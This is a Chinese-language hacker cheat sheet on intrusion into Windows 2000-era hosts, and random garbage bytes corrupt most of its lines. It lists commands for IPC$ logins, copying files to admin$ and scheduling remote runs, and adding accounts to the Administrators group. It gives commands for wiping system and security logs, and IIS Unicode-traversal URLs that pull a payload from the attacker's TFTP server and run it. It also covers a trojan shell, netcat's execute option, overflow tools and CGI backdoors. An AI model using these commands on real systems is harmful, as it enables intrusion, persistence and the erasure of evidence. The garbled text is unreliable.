网管和黑客都必须知道的命令
�hN]l
$Ct� 常用的几条NET命令:
V3r)u\ o' 6a�kI5�\�b (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
�m�U?�~s�7 s�K&k�p=zu (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
�cL;�%2TMk �J:����&.[ (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
���]j6�K3 �}H��mkT�k (查看远程主机时间) net time \\IP地址
J�[h�mY=�, vTK8t:JQ~� (定时启动某个程序) at \\IP地址 02:18 readme.exe
\b8#xT�}� V��@�b7�$z (查看共享) net view \\IP地址
H^@Hc��o>| H�-v[�Sh�E (查看netbios工作组列表) nbtstat -A IP地址
%�Q &']�� 7wP�I)�]$� (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
L=EkY O%\" �0�R�[fH�� (这两条把自己增加到管理员组): net user 用户名 密码 /add
b7~J�l+�m� Pc�<� "qy� net localgroup Administrators 用户名 /add
H.�'��9]�* f5b|�,�JJ� (断开连接) net use \\IP地址\ipc$ /delete
U�1E�@pDH� d�z�AumWoh 扫尾:
SG�|A�J�9� \ERx�r
�� del C:\winnt\system32\logfiles\*.*
F8{gJaP� x {Bk` Zlki del C:\winnt\ssytem32\config\*.evt
�3\
Mt+!1{ o�q!\10�0� del C:\winnt\system32\dtclog\*.*
<#nU 06 fN <�jF&+[*iT del C:\winnt\system32\*.log
�x>TIx[��x ?YZg��H>7" del C:\winnt\system32\*.txt
�g'7�\�WQ -��Fn�/=� del C:\winnt\*.txt
A:GqR;;"x> �N0�kCd�Jv del C:\winnt\*.log
&�dmIv[LU� �-Pt E+R[A 一、netsvc.exe
��r�,0D I� �Z$KyK.FUU 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
%N��~c9B� )e`9U.�C� netsvc /list \\IP地址
A�^���X��\ (�'C)S)98C netsvc schedule \\IP地址 /query
ecz�-jZ!
` Y,Z$U|�� U netsvc \\IP地址 schedule /start
��s�tUv! � x�W5�`.^�5 二、OpenTelnet.exe
[�m�
h>�N$ `�^�hA�&/1 远程启动主机的Telnet服务,并绑定端口到7878,例如:
:.Xl�AQR~b �
~,&8)�1 OpenTelnet \\IP地址 用户名 密码 1 7878
o4EY���2�� �S|�k@D2k= 然后就可以telnet到主机的7878端口,进入DOS方式下:
9c��k"JMla Dbj?l�;�'1 telnet IP地址 7878
(Z?f eUxp C��kNR{?�S 三、winshell.exe
y�x-"&K�=` :LNZC,-f}5 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
U2<q dknB
H+Bon=$cE! p Path (查看winshell主程序的路径信息)
��
�=5�B5� [#Gu�?L_�W b reBoot (重新启动机器)
*K$a;2WjzG �qg`a�e�� d shutDown (关闭机器)
Zn
r�4^i&( 6:�B,ir
_ s Shell (执行后你就会看到可爱的“C:\>”)
]J�!#"�m-] {Hl(t$3V`� x eXit (退出本次登录会话,此命令并不终止winshell的运行)
U=
f9b]��Y =CD6x=�
l6 CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
zc;kNkV#1Y �1�)�
2-UT 四、3389登陆器,GUI方式登录远程主机的
�V
)�o�XJL �f['lY1#V1 五、elsave.exe
6��c-'CW�
=lk'[P/�p` 事件日志清除工具
R-�-s
u�:
r�CA!b"�C2 elsave -s \\IP地址 -l "application" -C
.�U|'KCM9m !w%c=�V]tV elsave -s \\IP地址 -l "system" -C
';Nc�;9��� H�@wjZ�;R� elsave -s \\IP地址 -l "security" -C
�yy8B�kG(� �K\xM�%�O? 执行后成功清除应用程序日志,系统日志,安全日志
XBCH��Jj]k r���^C(|Vx 六、hbulot.exe
iZ�dl0;16[ �0R\.G1f% 开启win2kserver和winxp的3389服务
Y����B4
ZI ,~Xe��#e�M hbulot [/r]
�&(,�&mE� lg$�aRqI29 使用/r表示安装完成后自动重起目标使设置生效。
�qtZzJ>Y�� C}x�fo�}i 七、nc.exe(netcat.exe)
KP0��(�w(q �~b)X�:�ku 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
>�m1b/J�3# "A~��dt5GJ 想要连接到某处: nc [-options] hostname port[s] [ports] ...
&o��t^+uVH z5iC�Q4C<� 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
l�N5PKs�Gl leN�X5 sX� 参数:
�0Q7<;�'m }�[PwA[�k' -e prog 程序重定向,一旦连接,就执行 [危险!!]
[3-u7�F�x! .Er�+*j;&w -g gateway source-routing hop point[s], up to 8
��1/:vFX�� �DKMkCPX�% -G num source-routing pointer: 4, 8, 12, ...
P8dMfD*"E s,[�I_IiPf -h 帮助信息
-nC&�t�~sD LA\�3 ,�Uv -i secs 延时的间隔
V(ww
F�� t�i9e(Jt!O -l 监听模式,用于入站连接
bIBF2m��4 i��H�-,�l� -n 指定数字的IP地址,不能用hostname
2RNee@!JJP �L�c�}�hjK -o file 记录16进制的传输
L7��rr�/�D 5TuwXz�1v� -p port 本地端口号
e#mf{�1&�� ^z�nUf4N1� -r 任意指定本地及远程端口
M61Nl)|mx& l�c5(^���~ -s addr 本地源地址
$X)|`$#pL# b1IAp�>*2l -u UDP模式
]JGq{I>%+6 m)<+?Bv� y -v 详细输出——用两个-v可得到更详细的内容
~s'}_5;V�Y a�DX&�j�2/ -w secs timeout的时间
cy��Wb�*Wv ~x�'8T!M{ -z 将输入输出关掉——用于扫描时
b�&�h'>��( 八、TFTPD32.EXE
]=-=D9Z�S3 [�F�ag\/Y+ 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
� �8(��K:2 ,R�-k�]^O� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
xu���-�bn� �R�E4�#a�2 然后可以直接令文件运行:
RF2I��_4�� m�2(�}$z3e http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
U�cy=I��$" Q
�Rr9|p{� 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
�[>p�!*%�m $0$sDN6�)x 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
:/][ n9�J^ 0~��$9z+S� 一、一 Xscan命令行运行参数说明:
DcaK�Gj�p� |;�Jt�*
�_ 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
�/��O.q�4p �R{A$|Ipaq 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
JleClB(2n/ qrw*?6mS�Q xscan -file <主机列表文件名> <检测项目> [其他选项]
=eW4?9Uq� *zwe�ZG�8: 其中<检测项目> 含义如下:
�K-P�cew^? 1qn�/*9W}= -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
X.#9[3U+� _/P��;`�@� -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
F)eP�55C6� �V[WZ#�u-p -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
��Vtj*O'�0 A~>B?Wijqg -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
�?r�t[
aK �z)*{b�z] -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
lAA�6tlc#C =<9Mv+Ry�8 [其他选项] 含义如下:
#h���uh!Mn n�>Oze7hVY -v: 显示详细扫描进度
���1 �<�T| %|J�L=E}%| -p: 跳过Ping不通的主机
�V�:5aq.o! };9/�J3]m� -o: 跳过没有检测到开放端口的主机
k??C��XW�� 8_�`��C&vx -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
